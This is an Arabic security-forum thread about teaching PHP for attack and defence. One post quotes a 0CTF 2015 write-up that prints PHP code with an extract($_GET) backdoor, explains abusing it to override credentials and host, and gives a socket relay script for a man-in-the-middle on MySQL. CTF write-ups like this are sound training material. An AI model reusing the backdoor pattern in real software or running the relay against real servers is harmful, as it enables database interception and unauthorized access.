TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > أساسيات حماية وتطوير السكريبتات

أساسيات حماية وتطوير السكريبتات قسم يختص بسد ثغرات السكربتات وتطويرها

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 09-02-2016, 04:35 PM
الصورة الرمزية 4gud
4gud
عضو نشيط
 
حـالة التــواجـد : 4gud غير متواجد حالياً
تاريخ التسجيل: Jan 2016
الجــــنــــــس: ذكـر
المشاركات: 57
شكراً:48
تم شكره 16 مرة في 12 مشاركة
معدل تقييم المستوى: 0
4gud بدون تقييم
Talking Php 4 hacker

السلام عليكم و الرحمة الله
الرائج هذه الايام لاسباب اكثرها مادي دورات تننهي ب 4 hacker لتفادي هذه السطحية في التعليم اقترح على الاخوة من يحيد php ان يقوم بنشر سكريبت يفيد في الحماية و نفس الوقت في الاختراق ؟؟

اي دورة الحماية/الاختراق ب Php .. لا اتحدث عن echo ,if ..else ..

القصد socket و $_FILE ... الضعف و الية الاستغلال

اتمنى ان تكون الفطرة قد وصلت  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ 4gud على المشاركة المفيدة:
  #2  
قديم 09-02-2016, 04:45 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,671
شكراً:4,473
تم شكره 5,466 مرة في 1,364 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: Php 4 hacker

الـ php توجد لغة واحدة فقط لا عشرة .. الدورات بالمنتدى اثبتت ان الأشخاص غير مهتمين ببذل الجهد .. يفتح فمه وينتظر اللقمة الممضوغة تدخل وما عليه سوى بلعها ثم انتقاد من اوصلها اليه.  
رد مع اقتباس
12 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #3  
قديم 09-02-2016, 05:12 PM
الصورة الرمزية selhab
selhab
عضو نشيط
 
حـالة التــواجـد : selhab غير متواجد حالياً
تاريخ التسجيل: Feb 2013
مكـان الإقامـة : القاهرة
الجــــنــــــس: ذكـر
المشاركات: 93
شكراً:211
تم شكره 180 مرة في 41 مشاركة
معدل تقييم المستوى: 0
selhab بدون تقييم
افتراضي رد: Php 4 hacker

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

الـ php توجد لغة واحدة فقط لا عشرة .. الدورات بالمنتدى اثبتت ان الأشخاص غير مهتمين ببذل الجهد .. يفتح فمه وينتظر اللقمة الممضوغة تدخل وما عليه سوى بلعها ثم انتقاد من اوصلها اليه.
لا اوافقك الرأى ف على سبيل المثال دورة فارس و التى كانت تتكلم عن استغلال الثغرات و نقاط ضعف سكربتات ال web المبنية بلغة PHP حازت على اعجاب الكثير و الشكر التقدير من الكثير من الاعضاء  

 

 

mess with the best and die like the rest
رد مع اقتباس
4 أعضاء قالوا شكراً لـ selhab على المشاركة المفيدة:
  #4  
قديم 09-02-2016, 07:40 PM
الصورة الرمزية Nani17
Nani17

TeaM C
 
حـالة التــواجـد : Nani17 غير متواجد حالياً
تاريخ التسجيل: May 2010
مكـان الإقامـة : Syria
الجــــنــــــس: ذكـر
المشاركات: 637
شكراً:915
تم شكره 1,032 مرة في 279 مشاركة
معدل تقييم المستوى: 10
Nani17 على طريق التميز
Wink رد: Php 4 hacker

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

الـ php توجد لغة واحدة فقط لا عشرة .. الدورات بالمنتدى اثبتت ان الأشخاص غير مهتمين ببذل الجهد .. يفتح فمه وينتظر اللقمة الممضوغة تدخل وما عليه سوى بلعها ثم انتقاد من اوصلها اليه.
أول دورة اكتشاف ثغرات اقيمت في المنتدى كنت من المشاركين بها
لكن لم أستطع إكمال نشاطي فيها بسبب الأوضاع بسوريا وتم طردي

استفدت كثيراً شخصياً ودخلت في مجال الفحص من بعد هذه الدورة والحمدلله وفُقّتٌ بنتائج جيدة  

 

 

------------------------------

يـا رَبّ
رد مع اقتباس
2 أعضاء قالوا شكراً لـ Nani17 على المشاركة المفيدة:
  #5  
قديم 09-02-2016, 07:43 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,671
شكراً:4,473
تم شكره 5,466 مرة في 1,364 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: Php 4 hacker

اقتباس:
المشاركة الأصلية كتبت بواسطة selhab مشاهدة المشاركة

لا اوافقك الرأى ف على سبيل المثال دورة فارس و التى كانت تتكلم عن استغلال الثغرات و نقاط ضعف سكربتات ال web المبنية بلغة php حازت على اعجاب الكثير و الشكر التقدير من الكثير من الاعضاء
اقتباس:
المشاركة الأصلية كتبت بواسطة nani17 مشاهدة المشاركة

أول دورة اكتشاف ثغرات اقيمت في المنتدى كنت من المشاركين بها
لكن لم أستطع إكمال نشاطي فيها بسبب الأوضاع بسوريا وتم طردي

استفدت كثيراً شخصياً ودخلت في مجال الفحص من بعد هذه الدورة والحمدلله وفُقّتٌ بنتائج جيدة
انا قصدت الدورات الخاصة بلغات البرمجة وليس المسابقات..
مثال ليس ببعيد دورة لغة البيرل ..  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #6  
قديم 09-02-2016, 09:31 PM
الصورة الرمزية 4gud
4gud
عضو نشيط
 
حـالة التــواجـد : 4gud غير متواجد حالياً
تاريخ التسجيل: Jan 2016
الجــــنــــــس: ذكـر
المشاركات: 57
شكراً:48
تم شكره 16 مرة في 12 مشاركة
معدل تقييم المستوى: 0
4gud بدون تقييم
افتراضي رد: Php 4 hacker

ساعطيك مثال :

هدا كود و جدته و انا ابحث في النت كيفية استغلال التغراث php كما يتم استغلال كما Bof ههه :
اقتباس:
## Write-up

This task is a web task worth 250 points from the 0CTF 2015.
There is an input field, and two buttons : Login and FLAG.<br>
FLAG gives us the source code of the task, without the db credentials :

```php
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
include("./inc.php"); // key & database config

function err($str){ die("<استبدال script>alert(\"$str\");window.location.href= './';</استبدال script>"); }

$nonce = mt_rand();

extract($_GET); // this is my backdoor

if (empty($_POST['key'])) {

err("Parameter Missing!");
}

if ($_POST['key'] !== $key) {
err("You Are Not Authorized!");
}

$conn = mysql_connect($host, $user, $pass);

if (!$conn) {
err("Database Error, Please Contact with GameMaster!");
}

$query = isset($_POST['query']) ? bin2hex($_POST['query']) : "SELECT flag FROM forward.flag";
$res = mysql_query($query);
if (FALSE == $res) {
err("Database Error, Please Contact with GameMaster!");
}

$row = mysql_fetch_array($res);

if ($debug) {
echo "HOST:\t{$host}<br/>";
echo "USER:\t{$user}<br/>";
}

echo "<del>FLAG:\t0ctf{</del>" . sha1($nonce . md5($row['flag'])) . "<del>}</del><br/>"; // not real flag

mysql_close($conn);
?>
```
<br><br>
At this point, I was a bit sad, because I wanted to get the flag. <br>
After reading the source code, we can guess that we need to get our hands on $row['flag'].

There is also a HUGE hint : `this is my backdoor`.<br>
`extract` extracts variable from an array to the current scope.<br>
Exemple : extract(['foo' => 'bar']); is the same as $foo = 'bar';

We can use it to bypass the first check :
if `$_GET['key']` is set, `$key` will be set to it. (hence the backdoor)

Our first thought is that we can also use it to set nonce to '', so that the page outputs `sha1(md5($flag));`.<br>
This is pointless : we need to reverse a SHA1, then a MD5, and it would take forever.

We can set `$_GET['debug']` to 1, to gather informations about db host, and user :
```
HOST: 202.112.28.121
USER: forward
```
<br><br>
With `nc -vv 202.112.28.121 3306`, we can see the version of MySQL, and that it DOES accept connection from outside.<br>
We have no way to retrieve the password from the استبدال script. But we know that the استبدال script retrieves the flag.

Interesting thing :
`extract` is called after $host, $user and $pass definitions. It means we can also alter them.

I then made a استبدال script to set up a man-in-the-middle attack:<br>
- The web page (client) connects to my computer.<br>
- My computer connects to the MySQL server (server).<br>
- As soon as I read something on one of the sockets, I forward it to the other peer.

Here is the code :
```php
<?php
$socket = socket_create(2, 1, 0);
socket_bind($socket, 0, 3306);
socket_listen($socket);

$client = socket_accept($socket);

$server = socket_create(2, 1, 0);
socket_connect($server, '202.112.28.121', 3306);

socket_set_nonblock($client);
socket_set_nonblock($server);

while(true) {
$packet = socket_read($server, 4096);
if($packet) {
printf("S->C: %s\n", $packet);
socket_write($client, $packet);
}

$packet = socket_read($client, 4096);
if($packet) {
printf("S<-C: %s\n", $packet);
socket_write($server, $packet);
}
usleep(1e4);
}
?>
 
 
رد مع اقتباس
  #7  
قديم 09-02-2016, 10:02 PM
الصورة الرمزية Mr SiLv3r
Mr SiLv3r
عضو نشيط
 
حـالة التــواجـد : Mr SiLv3r غير متواجد حالياً
تاريخ التسجيل: Jun 2012
الجــــنــــــس: ذكـر
المشاركات: 73
شكراً:228
تم شكره 87 مرة في 25 مشاركة
معدل تقييم المستوى: 0
Mr SiLv3r بدون تقييم
افتراضي رد: Php 4 hacker

فعلا يا ريت القائمين علي الموقع يشوفو الفكره دي لان في ناس مبتدئه عايزه تتعلم  

 

 

Personal E-Mail : [email protected]
Contact me : PM Me
رد مع اقتباس
  #8  
قديم 10-02-2016, 12:19 AM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,671
شكراً:4,473
تم شكره 5,466 مرة في 1,364 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: Php 4 hacker

اقتباس:
المشاركة الأصلية كتبت بواسطة mr silv3r مشاهدة المشاركة

فعلا يا ريت القائمين علي الموقع يشوفو الفكره دي لان في ناس مبتدئه عايزه تتعلم
يمكن لاي شخص طرح مواضيع يساعد فيها المبتدئين .. ليس بالضرورة اشخاص من القائمين على الموقع.  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #9  
قديم 10-02-2016, 12:29 AM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,671
شكراً:4,473
تم شكره 5,466 مرة في 1,364 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: Php 4 hacker

اقتباس:
المشاركة الأصلية كتبت بواسطة wezx مشاهدة المشاركة

ساعطيك مثال :

هدا كود و جدته و انا ابحث في النت كيفية استغلال التغراث php كما يتم استغلال كما bof ههه :
اي شخص ملم بلغة ما يمكنه كشف الهفوات فيها. لذا الحل للتعمق في اكتشاف الثغرات هو التعمق في اللغة البرمجية المراد كشف الثغرات فيها .. غير ذلك تبقى في حلقة مفرغة.

الكود يلي وضغته عبارة عن ctf ,, ولعب مثل هذه التحديات يزيد في مستوى الشخص ونوهنا الى ذلك فأكثر من موضوع وفي اكثر من مناسبة..

كخلاصة بسيطة : العقلية الرائجة ما تسمح بالتعلم وكمثال قريب مسابقة الحماية للأبد .. المنظم يقول لا داعي لإستخدام ادوات ثم تجد السيرفر يسقط جراء استخدامها.

وكيما يقول المثل الشعبي : خلي البئر بغطاه.

 
رد مع اقتباس
7 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #10  
قديم 10-02-2016, 03:44 PM
الصورة الرمزية ViRuS_HaCkErS
ViRuS_HaCkErS
عضو نشيط
 
حـالة التــواجـد : ViRuS_HaCkErS غير متواجد حالياً
تاريخ التسجيل: Feb 2010
الجــــنــــــس: ذكـر
المشاركات: 43
شكراً:109
تم شكره 6 مرة في 6 مشاركة
معدل تقييم المستوى: 0
ViRuS_HaCkErS على طريق التميز
افتراضي رد: Php 4 hacker

اقتباس:
المشاركة الأصلية كتبت بواسطة uzundz مشاهدة المشاركة

اي شخص ملم بلغة ما يمكنه كشف الهفوات فيها. لذا الحل للتعمق في اكتشاف الثغرات هو التعمق في اللغة البرمجية المراد كشف الثغرات فيها .. غير ذلك تبقى في حلقة مفرغة.

الكود يلي وضغته عبارة عن ctf ,, ولعب مثل هذه التحديات يزيد في مستوى الشخص ونوهنا الى ذلك فأكثر من موضوع وفي اكثر من مناسبة..

كخلاصة بسيطة : العقلية الرائجة ما تسمح بالتعلم وكمثال قريب مسابقة الحماية للأبد .. المنظم يقول لا داعي لإستخدام ادوات ثم تجد السيرفر يسقط جراء استخدامها.

وكيما يقول المثل الشعبي : خلي البئر بغطاه.

يعطيك العافيه صراحه يوجد بالمنتدى كثير من الاعضاء اللي مستواهم جميل جدا في اكتشاف الثغرات

وبلغه البرمجه وانا كنت من المشاركين في مسابقه اكتشاف الثغرات بس انا من فلسطين وفي مشاكل بالكهرباء فدخلت بعد يومين فوجئت انه تم ابعادي من المسابقه هل من الممكن انو تفتحو القسم بعد ان تم انهاء المسابقه للاعضاء للاستفاده لانو صراحه انا ستفدت كتير في طرق كتابه استغلال وطرق اكتشاف الثغرات وطب اكيد سبب وجود المنتدى هو افادة الاعضاء والمجتمع العربي فا يا ريت انو يتم فتح القسم لجميع الاعضاء ويعطيك العافيه  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ViRuS_HaCkErS على المشاركة المفيدة:

الكلمات الدلالية (Tags)
4, hacker, php


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
The Top 10 Best Hacker Movies DamaneDz القسم العام 6 15-02-2015 02:16 AM


الساعة الآن 05:41 AM